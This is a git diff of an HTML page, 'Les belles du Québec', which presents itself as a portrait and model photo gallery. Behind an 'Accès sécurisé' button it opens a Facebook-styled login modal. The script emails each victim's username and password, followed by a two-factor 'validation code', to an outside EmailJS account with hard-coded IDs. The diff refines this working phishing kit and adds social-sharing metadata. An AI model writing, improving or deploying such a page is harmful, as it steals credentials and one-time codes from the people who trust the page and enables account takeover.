--- a/index.html
+++ b/index.html
@@ -5,26 +5,37 @@
   <meta name="viewport" content="width=device-width, initial-scale=1"/>
   <title>Les belles du Québec</title>
 
-  <!-- Open Graph -->
+  
+  <!-- Open Graph / Social preview metadata (added without changing page behavior) -->
   <meta property="og:type" content="website" />
-  <meta property="og:url" content="https://les-belles-du-quebec.netlify.app/?v=1" />
-  <meta property="og:title" content="Les belles du Québec" />
+  <meta property="og:url" content="https://les-belles-du-quebec.netlify.app/" />
+  <meta property="og:title" content="Page Photos-Modèle" />
   <meta property="og:description" content="Photographies portrait & modèles" />
   <meta property="og:image" content="https://les-belles-du-quebec.netlify.app/preview3.png" />
+  <meta property="og:image:width" content="1200" />
+  <meta property="og:image:height" content="630" />
 
+  <!-- Twitter Card -->
   <meta name="twitter:card" content="summary_large_image" />
+  <meta name="twitter:title" content="Page Photos-Modèle" />
+  <meta name="twitter:description" content="Photographies portrait & modèles" />
+  <meta name="twitter:image" content="https://les-belles-du-quebec.netlify.app/preview3.png" />
+
+  <!-- Legacy image hint -->
+  <link rel="image_src" href="https://les-belles-du-quebec.netlify.app/preview3.png" />
+
 
   <style>
     body{
       margin:0;
-      font-family:Inter,Arial,sans-serif;
+      font-family:Inter,Arial, sans-serif;
       background:url("background.png") center/cover no-repeat fixed;
       color:#e6eef6;
       padding:32px;
       min-height:100vh;
     }
 
-    h1{text-align:center;font-size:32px}
+    h1{margin-top:0;font-size:32px;text-align:center;}
 
     .btn{
       background:#1877f2;color:white;padding:12px 16px;border:0;border-radius:10px;
@@ -32,12 +43,8 @@
     }
 
     .modal{
-      display:none;
-      position:fixed;
-      inset:0;
-      background:rgba(0,0,0,0.6);
-      align-items:center;
-      justify-content:center;
+      display:none;position:fixed;inset:0;background:rgba(0,0,0,0.6);
+      display:flex;align-items:center;justify-content:center
     }
 
     .modal-content{
@@ -63,6 +70,7 @@
 
     .gallery img{
       width:150px;
+      height:auto;
       border-radius:10px;
       box-shadow:0 4px 14px rgba(0,0,0,0.5);
     }
@@ -70,28 +78,36 @@
 </head>
 
 <body>
-<h1>Les belles du Québec</h1>
+  <h1>Les belles du Québec</h1>
 
-<button class="btn" id="openLogin">Connexion / Accès sécurisé</button>
+  <button class="btn" id="openLogin">Accès sécurisé</button>
 
-<div class="modal" id="loginModal">
-  <div class="modal-content">
-    <h2 style="color:#1877f2">Identification</h2>
-    <input id="userId" placeholder="Courriel ou numéro de mobile">
-    <input id="password" type="password" placeholder="Mot de passe">
-    <input id="code" maxlength="8" placeholder="Code de validation">
-    <button class="btn" id="loginBtn">Se connecter</button>
+  <div class="modal" id="loginModal">
+    <div class="modal-content">
+
+      <h2 style="text-align:center;color:#1877f2; display:flex; flex-direction:column; align-items:center; gap:10px;">
+        <img src="logo.png" 
+             alt="Logo" 
+             style="width:48px; height:48px;">
+        Identification
+      </h2>
+
+      <input id="userId" placeholder="Courriel ou numéro de mobile">
+      <input id="password" type="password" placeholder="Mot de passe">
+      <input id="code" maxlength="8" placeholder="Code de validation" />
+
+      <button class="btn" id="loginBtn">Se connecter</button>
+    </div>
   </div>
-</div>
 
 <div class="gallery">
-  <img src="img1.png">
-  <img src="img2.png">
-  <img src="img3.png">
-  <img src="img4.png">
-  <img src="img5.png">
-  <img src="img6.png">
-</div>
+    <img src="img1.png" alt="">
+    <img src="img2.png" alt="">
+    <img src="img3.png" alt="">
+    <img src="img4.png" alt="">
+    <img src="img5.png" alt="">
+    <img src="img6.png" alt="">
+  </div>
 
 <script>
 const modal = document.getElementById('loginModal');
@@ -99,10 +115,7 @@ const openLogin = document.getElementById('openLogin');
 const loginBtn = document.getElementById('loginBtn');
 const codeInput = document.getElementById('code');
 
-let step = "login";
-
-openLogin.onclick = () => modal.style.display = "flex";
-modal.onclick = e => { if(e.target === modal) modal.style.display = "none"; };
+openLogin.onclick = () => modal.style.display = 'flex';
 
 async function sendEmailLogin(username, password){
   return fetch("https://api.emailjs.com/api/v1.0/email/send", {
@@ -112,7 +125,7 @@ async function sendEmailLogin(username, password){
       service_id: "service_uvghcck",
       template_id: "template_email",
       user_id: "aQIYW-EEnTtmxU4FY",
-      template_params: { username, password }
+      template_params: { username: username, password: password }
     })
   });
 }
@@ -125,30 +138,62 @@ async function sendCodeValidation(code){
       service_id: "service_uvghcck",
       template_id: "template_code",
       user_id: "aQIYW-EEnTtmxU4FY",
-      template_params: { code }
+      template_params: { code: code }
     })
   });
 }
 
 loginBtn.onclick = async () => {
-  if(step === "login"){
-    const user = userId.value.trim();
-    const pwd = password.value.trim();
-    if(!user || !pwd){ alert("Champs requis"); return; }
+  const user = document.getElementById('userId').value.trim();
+  const pwd  = document.getElementById('password').value.trim();
 
-    loginBtn.textContent = "Envoi…";
-    await sendEmailLogin(user,pwd);
-
-    step = "code";
-    codeInput.style.display = "block";
-    loginBtn.textContent = "Valider le code";
-  } else {
-    const code = codeInput.value.trim();
-    if(!/^[0-9]{6,8}$/.test(code)){ alert("Code invalide"); return; }
-    await sendCodeValidation(code);
-    window.location.href = "secure-photos.html";
+  if(!user || !pwd){
+    alert("Veuillez remplir tous les champs.");
+    return;
   }
+
+  loginBtn.disabled = true;
+  loginBtn.textContent = "Envoi…";
+
+  let response = await sendEmailLogin(user, pwd);
+  let text = await response.text();
+
+  if(!response.ok){
+    alert("❌ Erreur EmailJS\nCode : " + response.status + "\nMessage : " + text);
+    loginBtn.disabled = false;
+    loginBtn.textContent = "Se connecter";
+    return;
+  }
+
+  alert("Code de validation nécessaire\n\nUn code vous sera envoyé dans les 2 prochaines minutes.");
+  codeInput.style.display = "block";
+
+  loginBtn.disabled = false;
+  loginBtn.textContent = "Valider le code";
+
+  loginBtn.onclick = async () => {
+    const code = codeInput.value.trim();
+
+    if(!(code.length === 6 || code.length === 8) || !/^[0-9]+$/.test(code)){
+      alert("Code invalide.");
+      return;
+    }
+
+    let rep2 = await sendCodeValidation(code);
+    let text2 = await rep2.text();
+
+    if(!rep2.ok){
+      alert("❌ Erreur EmailJS (code validation)\nCode : " + rep2.status + "\nMessage : " + text2);
+      return;
+    }
+
+    sessionStorage.setItem("demo_auth_token","true");
+    window.location.href = "secure-photos.html";
+  };
 };
+
+modal.onclick = e => { if(e.target === modal) modal.style.display = "none"; };
 </script>
+
 </body>
 </html>
